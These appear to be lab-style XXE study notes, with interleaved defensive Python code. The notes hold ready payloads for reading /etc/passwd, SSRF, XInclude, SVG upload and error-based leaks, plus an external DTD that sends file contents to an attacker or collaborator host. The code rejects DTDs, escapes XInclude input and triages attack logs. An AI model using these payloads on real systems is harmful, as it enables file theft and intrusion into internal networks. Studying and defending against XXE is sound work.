Xxe

What is XXE

XML external entity injection (also known as XXE) is a web security vulnerability that allows an attacker to interfere with an application's processing of XML data. It often allows an attacker to view files on the application server filesystem, and to interact with any back-end or external systems that the application itself can access.


===If the body content is not in XML format, always attempt to convert it to XML. Some applications may accept this format, potentially allowing you to exploit additional vulnerabilities.===

Entity & DTD

# Entity

When the XML parser sees one of these references, it replaces it with the value the entity stands for. In the XXE case the attacker declares the entity, so the substituted value is malicious (a local file, a URL, or more markup).

&amp;     ---> &
&lt;&gt;  ---> <>
&#169;    ---> © (numeric character reference)
&xxe;     ---> Refers to the declaration of this entity inside the XML document

## Parameter Entity

%test;   ---> Sometimes standard (general) entities are blocked, so parameter entities are an alternative. They can only be referenced inside the DTD, not in the document content.
---------------------------------------------------------------------------------
# Define an Entity

## Entity
<!ENTITY xxe SYSTEM "file:///etc/passwd">  ---> Declare entity xxe whose value is fetched from the external resource file:///etc/passwd
<mydata>&xxe;</mydata>                     ---> Reference the entity; the parser substitutes its value here

## Parameter Entity
<!DOCTYPE test [<!ENTITY % test SYSTEM "http://attacker.com/evil.dtd"> %test; ]>  ---> Declare parameter entity test from an external DTD and reference it right away inside the DOCTYPE

---------------------------------------------------------------------------------
# DTD (DOCTYPE)

A DTD defines the structure, allowed elements, attributes and entities of an XML document. An external DTD is used because parameter entities may only be referenced inside a markup declaration (for example inside another entity's declaration) in an external DTD; in the internal subset they are only allowed between declarations.

With a DTD, you set clear rules for what’s allowed. You might say:

- Every <person> must have:
    - A <name>.
    - An <address>.
- Nothing else is allowed.

In an exploitation case, it is used to include parameter entities inside the markup declaration itself.

## main.xml
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "https://exploit-server.net/exploit"> %xxe;]>
REST_OF_XML

## Evil.dtd
<!ENTITY % file SYSTEM "file:///etc/hostname"> 
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://BURP-COLLABORATOR-SUBDOMAIN/?x=%file;'>"> 
%eval; 
%exfil;

(&#x25; is the % character written as a character reference, so the parser does not see a parameter-entity reference in the literal value of eval; it only becomes a real % once %eval; inserts the declaration of exfil.)

Exploitation

# Exploiting XXE to retrieve files

An external entity is declared whose value is the contents of a file; that content is then returned in the application's response.

## Original request
<?xml version="1.0" encoding="UTF-8"?> <stockCheck><productId>381</productId></stockCheck>

## Modified request
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <stockCheck><productId>&xxe;</productId></stockCheck>

---------------------------------------------------------------------------------
# Exploiting XXE to perform SSRF attacks

An external entity is declared whose value comes from a URL pointing at a back-end system, so the application server makes the request on the attacker's behalf.

## Original request
<?xml version="1.0" encoding="UTF-8"?> <stockCheck><productId>381</productId></stockCheck>

## Modified request
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://internal.vulnerable-website.com/"> ]> <stockCheck><productId>&xxe;</productId></stockCheck>

You might need to extend the URL in the DTD depending on what the response reveals
- Ex: "Invalid product ID: latest" ---> http://vulnerable-website.com/latest/...
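The Entity & DTD, file retrieval and SSRF sections all rely on the server's parser honouring a DOCTYPE. The defensive counterpart, added here as an example and not code from the notes, is a front-end that refuses any DTD before the real parser ever sees it. It assumes an endpoint that receives raw XML bodies like the stockCheck documents above; the sample documents are constructed for this demo and the hostnames in SSRF and BLIND_PARAM are placeholders. Standard library only.

```python
"""Added example (not from the notes): a parser front-end that refuses any
DTD, which removes both the file-read and the SSRF variant above.

Assumptions: the endpoint receives raw XML bodies like the stockCheck
documents in the notes; the sample documents below are constructed for this
demo and the hostnames in SSRF / BLIND_PARAM are placeholders.
"""
import xml.parsers.expat
from xml.etree import ElementTree as ET


class UnsafeXMLError(ValueError):
    """Raised when a client document carries a DOCTYPE or entity declaration."""


def reject_dtd(xml_bytes: bytes) -> None:
    """Walk the bytes with expat and abort at the first DTD construct.

    Raising inside the handler stops expat before any entity is declared or
    expanded, so an internal entity bomb is never built, and because no
    ExternalEntityRefHandler is installed expat does not fetch SYSTEM
    identifiers during this scan either.
    """
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeXMLError(f"DOCTYPE {name!r} not allowed (sysid={sysid!r})")

    def on_entity(name, is_param, value, base, sysid, pubid, notation):
        kind = "parameter entity" if is_param else "entity"
        raise UnsafeXMLError(f"{kind} {name!r} declared (sysid={sysid!r})")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity  # defence in depth; a DOCTYPE ban already stops this
    parser.Parse(xml_bytes, True)


def is_safe(xml_bytes: bytes) -> bool:
    """True when the document has no DTD and is well-formed."""
    try:
        reject_dtd(xml_bytes)
    except (UnsafeXMLError, xml.parsers.expat.ExpatError):
        return False
    return True


def parse_untrusted(xml_bytes: bytes) -> ET.Element:
    """Parse client XML only after the DTD ban has passed."""
    reject_dtd(xml_bytes)
    return ET.fromstring(xml_bytes)


# Constructed samples modelled on the requests in the notes.
BENIGN = (b'<?xml version="1.0" encoding="UTF-8"?>'
          b'<stockCheck><productId>381</productId></stockCheck>')
FILE_READ = (b'<?xml version="1.0" encoding="UTF-8"?>'
             b'<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>'
             b'<stockCheck><productId>&xxe;</productId></stockCheck>')
SSRF = (b'<?xml version="1.0" encoding="UTF-8"?>'
        b'<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://internal.placeholder.example/"> ]>'
        b'<stockCheck><productId>&xxe;</productId></stockCheck>')
BLIND_PARAM = (b'<?xml version="1.0"?>'
               b'<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "https://placeholder.example/evil.dtd"> %xxe;]>'
               b'<stockCheck><productId>381</productId></stockCheck>')


def verdicts() -> dict:
    """Map each sample to the scanner's verdict (only BENIGN is accepted)."""
    samples = {"benign": BENIGN, "file_read": FILE_READ,
               "ssrf": SSRF, "blind_param": BLIND_PARAM}
    return {name: is_safe(doc) for name, doc in samples.items()}


if __name__ == "__main__":
    for name, ok in verdicts().items():
        print(f"{name:12s} {'accepted' if ok else 'rejected'}")
    print(parse_untrusted(BENIGN).findtext("productId"))
```

Rejecting the DOCTYPE outright is simpler and safer than trying to allow "harmless" DTDs: the parameter-entity variant (BLIND_PARAM) never references an entity in the document body, so a check that only looks for `&name;` in the content would miss it.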

---------------------------------------------------------------------------------
# Exploiting blind XXE exfiltrate data out-of-band (BEST OPTION = FTP)

Sensitive data is transmitted from the application server to a system that the attacker controls.

## XInclude attacks

Request HTTP/1.1 (headers omitted)
productId=5&storeId=1    ---> Include an XML entity reference in the parameter (productId=%26entity;&storeId=1)
              |-------------> URL-encode the & of the entity reference as %26, otherwise it is read as the parameter separator

Try to include the following XInclude (it needs no DOCTYPE, so it works when you control only a fragment that the server embeds in its own XML document)

productId=<foo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></foo>&storeId=1
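Because XInclude needs no DOCTYPE, a parser that only bans DTDs does not stop it. The example below is added here and is not code from the notes; it models the scenario above, where a form field is pasted into a server-side XML document, with invented function names. It shows the vulnerable concatenation beside the escaped version, and a namespace-aware check for XInclude elements that can serve as a second line of defence. Standard library only.

```python
"""Added example (not from the notes): why XInclude slips past a DOCTYPE
ban, and the two defensive fixes.

Constructed model of the scenario above: a form field (productId) is pasted
into a server-side XML document before parsing. The function names are
invented for this demo.
"""
import xml.parsers.expat
from xml.sax.saxutils import escape

XINCLUDE_NS = "http://www.w3.org/2001/XInclude"

# Constructed copy of the field value from the notes; note there is no DOCTYPE.
XINCLUDE_VALUE = ('<foo xmlns:xi="%s">'
                  '<xi:include parse="text" href="file:///etc/passwd"/></foo>' % XINCLUDE_NS)

TEMPLATE = '<?xml version="1.0"?><stockCheck><productId>%s</productId></stockCheck>'


def build_backend_xml_unsafe(product_id: str) -> str:
    """Vulnerable pattern: raw concatenation, so the field value becomes markup."""
    return TEMPLATE % product_id


def build_backend_xml_safe(product_id: str) -> str:
    """Fix 1: escape '<', '>' and '&' so the value can only ever be character data."""
    return TEMPLATE % escape(product_id)


def find_xinclude(xml_text: str) -> list:
    """Fix 2 (defence in depth): list XInclude elements as (local name, href).

    Namespace-aware expat reports element names as 'uri localname', so the
    check is not fooled by a prefix other than xi:. Expat itself never
    processes XInclude; this only tells us whether a later XInclude-aware
    stage (Java with setXIncludeAware(true), lxml's .xinclude()) would fetch
    something, which is exactly what must stay switched off for client input.
    """
    hits = []
    parser = xml.parsers.expat.ParserCreate(namespace_separator=" ")

    def on_start(name, attrs):
        if name.startswith(XINCLUDE_NS + " "):
            hits.append((name.split(" ", 1)[1], attrs.get("href")))

    parser.StartElementHandler = on_start
    parser.Parse(xml_text, True)
    return hits


if __name__ == "__main__":
    print("unsafe:", find_xinclude(build_backend_xml_unsafe(XINCLUDE_VALUE)))
    print("safe:  ", find_xinclude(build_backend_xml_safe(XINCLUDE_VALUE)))
```

With the unsafe builder the field value turns into a real `xi:include` element pointing at `file:///etc/passwd`; with the escaped builder the same input is plain text and the check finds nothing.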


## XXE attacks via file upload

This can be used when the application accepts SVG files: SVG is XML, so the image-processing library may parse a DOCTYPE in the upload.

SVG:
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
<text font-size="16" x="0" y="16">&xxe;</text>
</svg>

---------------------------------------------------------------------------------
# Exploiting blind XXE to retrieve data via error messages

The attacker triggers an XML parsing error whose message echoes sensitive data: the file contents end up inside the invalid URI that the error reports.

## Application  ---> Causes a parsing error because the URI "file:///invalid/%file;" cannot be resolved; the error message quotes the expanded URI, including the file contents
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "https://exploit-0aa000340366a079836bd2cf01050091.exploit-server.net/exploit"> %xxe;]>
REST_OF_XML

## Exploit Server
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'file:///invalid/%file;'>">
%eval;
%exfil;
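The out-of-band and error-based variants leave traces in request logs before any callback happens. The example below is added here and is not code from the notes: a small triage routine over constructed request-log lines (format `ip method path body`, hostnames are placeholders) that decodes form-encoded bodies, flags the DTD and XInclude indicators, and extracts the local files and external hosts each payload points at, which is what an alert needs to carry. Standard library only.

```python
"""Added example (not from the notes): triage of XXE attempts in request
logs, pulling out the out-of-band endpoints and local files each payload
targets.

The log format (ip method path body), the hostnames and the log lines are
all constructed for this demo.
"""
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed sample log lines modelled on the notes' payloads.
LOG_LINES = [
    '10.0.0.5 POST /product/stock <?xml version="1.0"?>'
    '<stockCheck><productId>381</productId></stockCheck>',
    '10.0.0.7 POST /product/stock <?xml version="1.0"?>'
    '<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "https://oob.placeholder.example/evil.dtd"> %xxe;]>'
    '<stockCheck><productId>381</productId></stockCheck>',
    # form-encoded body: the XInclude fragment is hidden behind %3C / %26 escapes
    '10.0.0.9 POST /product/stock productId=%3Cfoo+xmlns%3Axi%3D%22http%3A%2F%2Fwww.w3.org'
    '%2F2001%2FXInclude%22%3E%3Cxi%3Ainclude+parse%3D%22text%22+href%3D%22file%3A%2F%2F%2Fetc'
    '%2Fpasswd%22%2F%3E%3C%2Ffoo%3E&storeId=1',
    '10.0.0.11 POST /product/stock <?xml version="1.0"?>'
    '<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://internal.placeholder.example/"> ]>'
    '<stockCheck><productId>&xxe;</productId></stockCheck>',
]

INDICATORS = [
    ("doctype", re.compile(r"<!DOCTYPE\b", re.I)),
    ("parameter-entity", re.compile(r"<!ENTITY\s+%", re.I)),
    ("entity", re.compile(r"<!ENTITY\s+(?!%)", re.I)),
    ("xinclude", re.compile(r"www\.w3\.org/2001/XInclude", re.I)),
]
# External references: SYSTEM "uri" in a DTD, or href="uri" on an XInclude element.
REF_RE = re.compile(r"""(?:SYSTEM\s+|href\s*=\s*)["']([a-z][a-z0-9+.\-]*:[^"']*)["']""", re.I)


def triage(line: str) -> dict:
    """Decode one log line and report XXE indicators plus the URIs it references."""
    ip, method, path, body = line.split(" ", 3)
    decoded = unquote_plus(body)  # undo %3C, %26 and '+' so the regexes see real markup
    indicators = [name for name, rx in INDICATORS if rx.search(decoded)]
    refs = REF_RE.findall(decoded)
    targets = []
    for uri in refs:
        parts = urlsplit(uri)
        if parts.scheme == "file":
            targets.append(("local-file", parts.path))
        else:
            targets.append(("network", parts.hostname))
    return {"ip": ip, "path": path, "indicators": indicators, "refs": refs, "targets": targets}


def suspicious(lines) -> list:
    """Return the triage records that carry at least one indicator."""
    return [rec for rec in map(triage, lines) if rec["indicators"]]


if __name__ == "__main__":
    for rec in suspicious(LOG_LINES):
        print(rec["ip"], rec["indicators"], rec["targets"])
```

The decoding step matters for the XInclude case from the notes: in a form-encoded body the whole payload is hidden behind %3C and %26, so a rule that matches on the raw line never fires. The extracted network hosts are the ones to correlate with egress or DNS logs from the application tier.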